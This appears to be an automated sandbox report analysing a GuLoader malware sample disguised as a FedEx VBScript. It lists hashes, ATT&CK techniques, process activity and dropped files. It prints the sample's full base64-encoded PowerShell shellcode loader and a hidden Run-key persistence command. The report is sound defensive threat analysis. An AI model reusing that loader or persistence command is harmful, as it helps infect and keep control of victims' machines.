guloader | 19469f11cba8ab55b84cf26efa8835e906d07fdb73572c9ee3594e5c44c798bf

General

Target

775578748333_FEDEX.vbs
Size

75KB
MD5

5d3ad82ef16521df753bc6baff37f72f
SHA1

ac4df3a47570b88a4768c2c461b15f78b99753dd
SHA256

19469f11cba8ab55b84cf26efa8835e906d07fdb73572c9ee3594e5c44c798bf
SHA512

3e83cadcfdd061c49dc09c4cbedb99d6fa3eade1d83e7e549406c7631955a02fced9e3eba61d6d8ffc056cb0429ced5ca21c2976871b64f8c5d778ff9a5e1790

Score

10^/10

guloader downloader persistence

Malware Config

Signatures

Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader

Checks QEMU agent file 2 TTPs 2 IoCs

Checks presence of QEMU agent, possibly to detect virtualization.

Query Registry

T1012

System Information Discovery

T1082

Processes:

powershell.exeieinstal.exe

description	ioc	process
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	powershell.exe
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	ieinstal.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

ieinstal.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Windows\CurrentVersion\Run	ieinstal.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Windows\CurrentVersion\Run\opklbedebi = "cmd /c start /b c:\\windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe -windowstyle hidden $Retrocogni8=(Get-ItemProperty -Path 'HKCU:\\SOFTWARE\\AppDataLow\\').Rickey;powershell.exe -windowstyle hidden -encodedcommand($Retrocogni8)"	ieinstal.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.exeieinstal.exe

pid process

4332 powershell.exe
868 ieinstal.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 4332 set thread context of 868 4332 powershell.exe ieinstal.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exe

pid process

4332 powershell.exe
4332 powershell.exe
4332 powershell.exe
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

powershell.exe

pid process

4332 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 4332 powershell.exe

pid	process
4332	powershell.exe
868	ieinstal.exe

description	pid	process	target process
PID 4332 set thread context of 868	4332	powershell.exe	ieinstal.exe

pid	process
4332	powershell.exe
4332	powershell.exe
4332	powershell.exe

pid	process
4332	powershell.exe

description	pid	process
Token: SeDebugPrivilege	4332	powershell.exe

Suspicious use of WriteProcessMemory 13 IoCs

Processes:

WScript.exepowershell.execsc.exe

description	pid	process	target process
PID 3828 wrote to memory of 4332	3828	WScript.exe	powershell.exe
PID 3828 wrote to memory of 4332	3828	WScript.exe	powershell.exe
PID 3828 wrote to memory of 4332	3828	WScript.exe	powershell.exe
PID 4332 wrote to memory of 4000	4332	powershell.exe	csc.exe
PID 4332 wrote to memory of 4000	4332	powershell.exe	csc.exe
PID 4332 wrote to memory of 4000	4332	powershell.exe	csc.exe
PID 4000 wrote to memory of 2556	4000	csc.exe	cvtres.exe
PID 4000 wrote to memory of 2556	4000	csc.exe	cvtres.exe
PID 4000 wrote to memory of 2556	4000	csc.exe	cvtres.exe
PID 4332 wrote to memory of 868	4332	powershell.exe	ieinstal.exe
PID 4332 wrote to memory of 868	4332	powershell.exe	ieinstal.exe
PID 4332 wrote to memory of 868	4332	powershell.exe	ieinstal.exe
PID 4332 wrote to memory of 868	4332	powershell.exe	ieinstal.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\775578748333_FEDEX.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:3828

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBhAGcAcgB5ACAAUwBjAHIAaQB2AGUAbgAgAHMAeQBzAHQAZQBtAGsAbwAgAFQAcgBlAGQAagBlADUAIABDAGgAcgBvAG0AaQA4ACAAQgBJAEIATAAgAE8AdgBlAHIAcwB0AHIAZQA3ACAAcAByAGUAYwAgAEYAbwByAGwAaQBnAHMAaQBuADIAIABCAGUAbgBlAGYAaQB0ACAAQQBwAG8AdABoAGUAbwBzAGkAegAgAHUAZABlAHQAaQBsACAATABPAE8AUwBFACAAQgByAG4AZQB2AGUAOQAgAFQAbwBuAHMAaQAyACAAVAByAG8AcABpAHMAIABQAGwAZQB1AHIAbwBsAGkANAAgAGIAbABrAGsAIABDAHkAcwB0AGkAYwBlACAAVQBuAGQAZQByAHIAZQBwAG8AcgAxACAAUAByAG8AYwB1AGwAYwBhAHQAIABQAEEAUwBUAE8AUgAgAFMAYQBuAGcAIABjAG8AbQBiAGEAcgBvAG4AZgBvACAAbwBtAHAAcgAgAEQAYQBtAG4AZQBkADgAIABOAEUAUABIACAARgByAHUAaQB0AGkAdgBlAHIAZQAgAEQARQBGAEEASQBUAEkAUwAgAE0AaQBzAGsAZQBuAGQAZQA1ACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABTAGMAcgBpAHAAdABlAHIAZQAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAAUwBjAHIAaQBwAHQAZQByAGUANgAsAHIAZQBmACAASQBuAHQAMwAyACAAVABoAGUAbwByAGkAcwBlAHIAMgAsAGkAbgB0ACAAQQBVAFQATwBBAEMAVABJAFYARQAsAHIAZQBmACAASQBuAHQAMwAyACAAUwBjAHIAaQBwAHQAZQByAGUALABpAG4AdAAgAEwAZQBqAG4AaQA2ACwAaQBuAHQAIABTAGMAcgBpAHAAdABlAHIAZQA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAFAAcwBlAHUANAAsAHUAaQBuAHQAIABsAGkAbgBqAGUAcgAsAGkAbgB0ACAAUwBUAFIAWQAsAGkAbgB0ACAAUwBjAHIAaQBwAHQAZQByAGUAMAAsAGkAbgB0ACAAUwBFAEUAUgBOAEUALABpAG4AdAAgAFAAYQBjAGkAZgBpAGMAZQByADcALABpAG4AdAAgAEEAZAB2AGkAcwBlAG4AcwA5ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABSAGUAYQBkAEYAaQBsAGUAKABpAG4AdAAgAEEAVQBUAE8AQQBDAFQASQBWAEUAMAAsAHUAaQBuAHQAIABBAFUAVABPAEEAQwBUAEkAVgBFADEALABJAG4AdABQAHQAcgAgAEEAVQBUAE8AQQBDAFQASQBWAEUAMgAsAHIAZQBmACAASQBuAHQAMwAyACAAQQBVAFQATwBBAEMAVABJAFYARQAzACwAaQBuAHQAIABBAFUAVABPAEEAQwBUAEkAVgBFADQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwBhAGwAbABXAGkAbgBkAG8AdwBQAHIAbwBjAFcAKABJAG4AdABQAHQAcgAgAEEAVQBUAE8AQQBDAFQASQBWAEUANQAsAGkAbgB0ACAAQQBVAFQATwBBAEMAVABJAFYARQA2ACwAaQBuAHQAIABBAFUAVABPAEEAQwBUAEkAVgBFADcALABpAG4AdAAgAEEAVQBUAE8AQQBDAFQASQBWAEUAOAAsAGkAbgB0ACAAQQBVAFQATwBBAEMAVABJAFYARQA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAHIAZQBmAHIAIABDAGEAbgBjAGUAcgBpAG4AYwBvACAATABpAG4AZwB1AGEAdAB1AGwAIABoAGUAYQBsAGUAIABMAEUAVgBJAEcAQQBUACAATABJAEcASwBJAFMAVABFACAAcwB2AG8AdgBsACAAcABsAGEAdABvAG4AaQBzAG0AbQAgAE8AcABkAHIAaQBmAHQAcwAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIAaQBuAHQAZQAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBIAGEAYQBuAGQAYgBvAGwAZABoADYAIgAgAA0ACgAkAFMAYwByAGkAcAB0AGUAcgBlADMAPQAwADsADQAKACQAUwBjAHIAaQBwAHQAZQByAGUAOQA9ADEAMAA0ADgANQA3ADYAOwANAAoAJABTAGMAcgBpAHAAdABlAHIAZQA4AD0AWwBTAGMAcgBpAHAAdABlAHIAZQAxAF0AOgA6AE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAC0AMQAsAFsAcgBlAGYAXQAkAFMAYwByAGkAcAB0AGUAcgBlADMALAAwACwAWwByAGUAZgBdACQAUwBjAHIAaQBwAHQAZQByAGUAOQAsADEAMgAyADgAOAAsADYANAApAA0ACgAjAE8AYgBsAGkAZwBhAHQAIABPAHAAcwBrAHIAZQByAGYAcgBzACAARABlAHMAbwByADYAIABHAFIAVQBQAFAARQBNAEUARAAgAEwASQBWAFMASwBWAEEAIABzAHQAZQByAHMAcwB0ACAAQQBjAHQAaQBvAG4AYQByADYAIABBAG4AYQByAHQAaAByAG8AMQAgAFcAYQBtAHAAYQBuAG8AYQBnAG0ANwAgAFIAZQBnAG4AdgBlAGoAcgA3ACAAawBvAGUAYgB0AGYAdQByAHoAZQAgAEMAbwByAG4AbABlAHMAcwAzACAAQgByAHkAZwBoAHUAcwBlAGEAIABOAGkAZwBoAHQAaQBtAGUAIABiAGEAYQBsAHQAYQAgAGMAeQBjAGwAbwAgAFMAaQBuAGQAcwAzACAAUABMAEEARABFAEwAQQBHAEUAIABTAGsAaQBuAG4AZQBiAGUANgAgAFoAdwBlAGMAawBzAGMAbwBwADkAIAB0AGUAdQB0AG8AbgBpAHoAIABBAHMAcwBlAHMAcwBvAHIAZQAgAHIAZQBuAGEAcwAgAFYARQBBAEwAIABQAFIAUwBJAEQAIABCAG8AdgBiAGwAIABBAFMAWQBNACAATQBJAFIATwBTAEwASQAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIAUwBwAGkAbgAiACAADQAKACQAUwBjAHIAaQBwAHQAZQByAGUAMgA9ACIAJABlAG4AdgA6AHQAZQBtAHAAIgAgACsAIAAiAFwARwByAHUAbgBkAC4AZABhAHQAIgANAAoAIwBHAGUAbgBiAHIAdQBnAHMANwAgAHAAaAB5AHQAIABjAG8AcAByAGkAIABkAGUAbQBvAG4AcwB0AHIAYQAgAE0AZQB0AGgAeQBsAHAAIABTAG8AYwBpAGEAbAAxACAAcwB0AGEAbABsAGkAbgBnACAAZABvAGMAawB3ACAAdQBuAGIAZQAgAEIAYQBsAGwAYQBzACAAVgBhAG4AZAB1AGQAcwBrAGkAIABEAG8AbQBzACAAVgBlAGwAcwBlAHMAbwB2AGUAcgAgAHAAcgBvAGwAbwBjAHUAdABvAHIAIABUAEkARABTAEsAIABKAHUAcgBpAHMAdAAgAFQAaQBsAHMAaQBrAHIAZQB0AHIAIABzAHAAYQByAGsAZQBuAGUAbQBhACAAYgBlAHMAdAByAG4AaQBuAGcAIABTAFQAWQBSAEkATgBHAFMAQQAgAEIAbwBsAHQAZQBkAGUAIABCAE8ARABZAEcAIABEAEUAUwBVAEwAIABQAG8AcwB0AGEAdQByAGkAYwB1ACAAVAByAHkAawBuADQAIABJAE4ARABJAFYASQBEAFUAQQAgAFAASQBOAEMARQBUAFQAIAANAAoAJABTAGMAcgBpAHAAdABlAHIAZQA0AD0AWwBTAGMAcgBpAHAAdABlAHIAZQAxAF0AOgA6AEMAcgBlAGEAdABlAEYAaQBsAGUAQQAoACQAUwBjAHIAaQBwAHQAZQByAGUAMgAsADIAMQA0ADcANAA4ADMANgA0ADgALAAxACwAMAAsADMALAAxADIAOAAsADAAKQANAAoAIwBTAHUAbQBwAHQAdQBvAHUAcwAgAE0ATwBEAEUAUgBFAFIARQBSACAARAByAHkAcwAgAEgAQQBMAFMAQgBSACAAbABlAGQAaQBnACAARgBsAGEAZwBlAHIAbQB1AHMAZQAgAEUARgBUAEUAUgAgAFMASwBKAE8AUgBUACAARgBsAGkAbgA5ACAAQgBlAG4AZQBmAGkAYwBlAG4AIABmAG8AcgBtACAARQBtAGIAcgBlAGEAYwBoAHMAdAAyACAAZAByAGUAagBuAGkAbgBnAHMAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAHQAagByAGUAIgAgAA0ACgAkAFMAYwByAGkAcAB0AGUAcgBlADUAPQAwADsADQAKACMAbQBlAG4AcwB0AHIAdQBhAHQAZQAgAEEAZgBwAHIAdgBuAGkAbgBnAHMAMgAgAEwAdQBjAGkAbgBkADUAIABwAGUAdAByAGkAcwBhACAARwBlAG8AcABoAGEAZwBpAHMAIABQAGgAaQBsACAAQwB1AHQAdABsAGUANQAgAEEAawBrAG8AIABTAHQAYQBtADMAIABTAEwASQBCAEIARQBSAFMAQQBVACAAVgBlAHIAZABlAG4AcwA0ACAAUwBPAEwASQBEAEEAUgAgAEsAQQBSAFQAQQBVAEQASQBUAFIAIABNAE8AVQBSACAAYwBvAGMAawBzAHAAYQByACAAUwB0AGoAZQByAG4AZQBkADMAIABHAGUAbgBuAGUAbQA0ACAAYgBvAHIAdABrAGEAbABkACAAcwBkAGUAdABzAGkAbABrAGUAcwAgAHIAaQBnAG8AcgBpAHMAIABiAGEAbABkAHAAYQB0ACAASABWAEEATABGAEEATgBHACAAUwBhAHQAaQBuAGkAcwBlAHMAZwAgAGEAbgB0AGkAYwBsAGkAbQBhACAAbwB1AHQAcwB0AHIAaQAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIARAB1AGIAbABhAG4AdABzAGYAMwAiACAADQAKAFsAUwBjAHIAaQBwAHQAZQByAGUAMQBdADoAOgBSAGUAYQBkAEYAaQBsAGUAKAAkAFMAYwByAGkAcAB0AGUAcgBlADQALAAkAFMAYwByAGkAcAB0AGUAcgBlADMALAAyADYAMQAyADUALABbAHIAZQBmAF0AJABTAGMAcgBpAHAAdABlAHIAZQA1ACwAMAApAA0ACgAjAFAATwBVAEwAVABSAFkAIABBAHIAZQBuAHAAaABvAHQAbwBsADMAIABQAGEAcgBnACAAUgBlAGcAZQBsADUAIABMAGkAbgBpAHIAdQBuAGEAcwBoACAAVABvAHAAZgAzACAAZABpAGEAbABlAGsAdABpAGsAIABSAGUAcAByAG8AdgBhAGIAOAAgAEcAZQBhAHIAdgBsAGcAZQByAHMAIABVAEQARQBOAEUAVQBSAE8AUAAgAEMAQQBNAEIAVQBDAEEAUwBXACAAZgByAGEAZABtAG0AdABlAHcAZQAgAEYAYQByAHMAaQB1AG4AIABqAGUAcgBuAGIAYQBuAGUAbABpACAATABVAFYAUwBJAEcAQQBOAEcAIABBAGYAZABlAGwAaQBuACAAVABhAGIAZQBsAGwAZQAzACAAUAB1AHIAdgBpAGUAdwAzACAAUABsAGEAYwBlAGgAbwBsACAAYQByAHYAZQAgAFAAcgBpAGEAcAB1AGwAIABSAE8AUwBBAFUAUgAgAGQAaQBzAGMAIABTAFYAQQBSAEwAIABpAG4AZAB1AHMAIABTAE8AVQBCAEkAUwBFAFMAVAAgAHMAYwBoAG8AbwBsAHQAIABMAFIARQBSAEYATABVAEcAIABBAGcAcgBhAGYAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEkAbQBiAGEAcgBrACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAHIAZQBpAG0AcABsAGkAIgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIAQQBmAG0AbgAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBIAE8ATgBEAE4AIgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIARABpAHMAcgBpACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAFcAYQB5AGIAIgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIARwBBAFMAVABSAE8AQwAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBMAGUAZABkAGUAbAA3ACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAFUAbABkAHMAcABpAG4AMQAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBPAEMAQwBMACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAFUAbgBpAHYAZQByAHMAYQAyACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAFMATwBFAEIATwBSACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAE0AeQBvAHMAaQAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBCAHUAawBzAHMAdABhAGMAIgAgAA0ACgBbAFMAYwByAGkAcAB0AGUAcgBlADEAXQA6ADoAQwBhAGwAbABXAGkAbgBkAG8AdwBQAHIAbwBjAFcAKAAkAFMAYwByAGkAcAB0AGUAcgBlADMALAAgADAALAAwACwAMAAsADAAKQANAAoADQAKAA=="
2⤵
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4332

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mkzvawku\mkzvawku.cmdline"
3⤵
- Suspicious use of WriteProcessMemory
PID:4000

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3370.tmp" "c:\Users\Admin\AppData\Local\Temp\mkzvawku\CSCD1B623D4D67E407D8DC1096628B554.TMP"
4⤵
PID:2556

C:\Program Files (x86)\internet explorer\ieinstal.exe
"C:\Program Files (x86)\internet explorer\ieinstal.exe"
3⤵
- Checks QEMU agent file
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:868

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

1

T1060

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Grund.dat
MD5
2ec027f5af868cca83ad50c2e2604925

SHA1
61ea6d742efe598567175352e6d39e7949ce3cdc

SHA256
eccf8bd7acafe87be6fc4f5ae205d55475c631064c307b5bfcf4fffed570299a

SHA512
70d1b60bc9b57cfd1257c5e993ffb51c165ccd20b620a6fcf3eadc431c446af06423555c36be113754acd08a4b9e940858c7804a84ce61d23e2cfaf3e1b852bf

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES3370.tmp
MD5
7394f0abcb9ebcb17021e624327b729c

SHA1
8739f14d1ed5be8655d64a536f097e1d7f00de4c

SHA256
3ba172a68f5fc95a6a2484551790d4461fe240b2c1c004df30712c56d01ba987

SHA512
ff1d6a82d5481135561b324be17525a6de8f35c98247a39df73818a27e6442fdea61de4210204393bb959e660c17a99e6b7f443d008a5aee1c37ff467fc9a023

Download Submit
C:\Users\Admin\AppData\Local\Temp\mkzvawku\mkzvawku.dll
MD5
4f0bd644244bc6319215c97d9ab43281

SHA1
5e4a632c615d8fd59e6812f35dff837b5adabe85

SHA256
1e20f089f9b0aa9182ef69d1e81c6209e120eb2b7cae178909092409cb73d35e

SHA512
265d64b5ba92188f670a6c3bd2f4aa25ed5cd0f19f8f1eaf73245f2690eb0670325c84c3abe21913e69bd15ac02a36b6c8cec562a465b5ac61e0d19ce5356ca6

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\mkzvawku\CSCD1B623D4D67E407D8DC1096628B554.TMP
MD5
1e3e5c8454876af2bc498a79fbe77e4c

SHA1
25ae81ea5d0f479fbb57ebadd5753c9cec795a7d

SHA256
83fb153f57fae68dd1a42594627c01ca62232a256ca9c54f0d7dfd871e03e8de

SHA512
069310e7a9fcd97310097973db37ff86e539e272021da9230348bb1d4c3a63668298bb5d34fa4c75bc27606aea1c17371f303bf3c974570037e9abb2bb209623

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\mkzvawku\mkzvawku.0.cs
MD5
6314facbe2f665388a6b8f4b896dc466

SHA1
e2c28d0a6f2296f48c3cfb1e446cd6691bf1c252

SHA256
cd7e99d32cb2b1d17db5aa28cab64bf5a54562c1d3b46c2e19c07b924da350af

SHA512
f326a1eecd0e0f418607e688bd8466a65062e1615f5d8b82bf80a5474b10269ba95f465c3e6d6e78de11dd7b17bf7d0441542fbe545e54dab167544b620abab8

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\mkzvawku\mkzvawku.cmdline
MD5
84267d82427f2267b6d7d4e3e995fa9a

SHA1
a1bb68b75b3ecfa61dc62e057ea297ed17016615

SHA256
d785f5e3a808dcc6687fafb9471a8a1ad12d6e2534bddb956569eed0d4e7fd49

SHA512
0dd92df6e621c36b4962ea02453ca66fdde4058f64b7a2ba64d4505de5ce889f499fabfb57f8d2df1df7eeb41f4ed778c450c76cff6c0402961e7ae58d0dfd14

Download Submit
memory/868-162-0x0000000076FF0000-0x000000007717E000-memory.dmp

Filesize
1.6MB

Download
memory/868-161-0x0000000076FF0000-0x000000007717E000-memory.dmp

Filesize
1.6MB

Download
memory/868-160-0x00007FFB78390000-0x00007FFB7856B000-memory.dmp

Filesize
1.9MB

Download
memory/868-159-0x0000000003000000-0x0000000003290000-memory.dmp

Filesize
2.6MB

Download
memory/868-155-0x0000000003000000-0x0000000003100000-memory.dmp

Filesize
1024KB

Download
memory/4332-125-0x0000000007C00000-0x0000000007C1C000-memory.dmp

Filesize
112KB

Download
memory/4332-123-0x00000000072D0000-0x0000000007336000-memory.dmp

Filesize
408KB

Download
memory/4332-134-0x0000000009A80000-0x000000000A0F8000-memory.dmp

Filesize
6.5MB

Download
memory/4332-127-0x0000000008330000-0x00000000083A6000-memory.dmp

Filesize
472KB

Download
memory/4332-126-0x00000000080F0000-0x000000000813B000-memory.dmp

Filesize
300KB

Download
memory/4332-117-0x0000000000FD0000-0x0000000001006000-memory.dmp

Filesize
216KB

Download
memory/4332-124-0x0000000007CE0000-0x0000000008030000-memory.dmp

Filesize
3.3MB

Download
memory/4332-141-0x0000000007BA0000-0x0000000007BA8000-memory.dmp

Filesize
32KB

Download
memory/4332-146-0x0000000009530000-0x00000000095C4000-memory.dmp

Filesize
592KB

Download
memory/4332-147-0x0000000009490000-0x00000000094B2000-memory.dmp

Filesize
136KB

Download
memory/4332-148-0x000000000A600000-0x000000000AAFE000-memory.dmp

Filesize
5.0MB

Download
memory/4332-135-0x00000000091C0000-0x00000000091DA000-memory.dmp

Filesize
104KB

Download
memory/4332-150-0x0000000004CA3000-0x0000000004CA4000-memory.dmp

Filesize
4KB

Download
memory/4332-152-0x0000000009400000-0x0000000009A78000-memory.dmp

Filesize
6.5MB

Download
memory/4332-153-0x00007FFB78390000-0x00007FFB7856B000-memory.dmp

Filesize
1.9MB

Download
memory/4332-154-0x0000000076FF0000-0x000000007717E000-memory.dmp

Filesize
1.6MB

Download
memory/4332-122-0x0000000007260000-0x00000000072C6000-memory.dmp

Filesize
408KB

Download
memory/4332-158-0x0000000076FF0000-0x000000007717E000-memory.dmp

Filesize
1.6MB

Download
memory/4332-121-0x00000000071C0000-0x00000000071E2000-memory.dmp

Filesize
136KB

Download
memory/4332-119-0x0000000004CA0000-0x0000000004CA1000-memory.dmp

Filesize
4KB

Download
memory/4332-120-0x0000000004CA2000-0x0000000004CA3000-memory.dmp

Filesize
4KB

Download
memory/4332-118-0x00000000073F0000-0x0000000007A18000-memory.dmp

Filesize
6.2MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads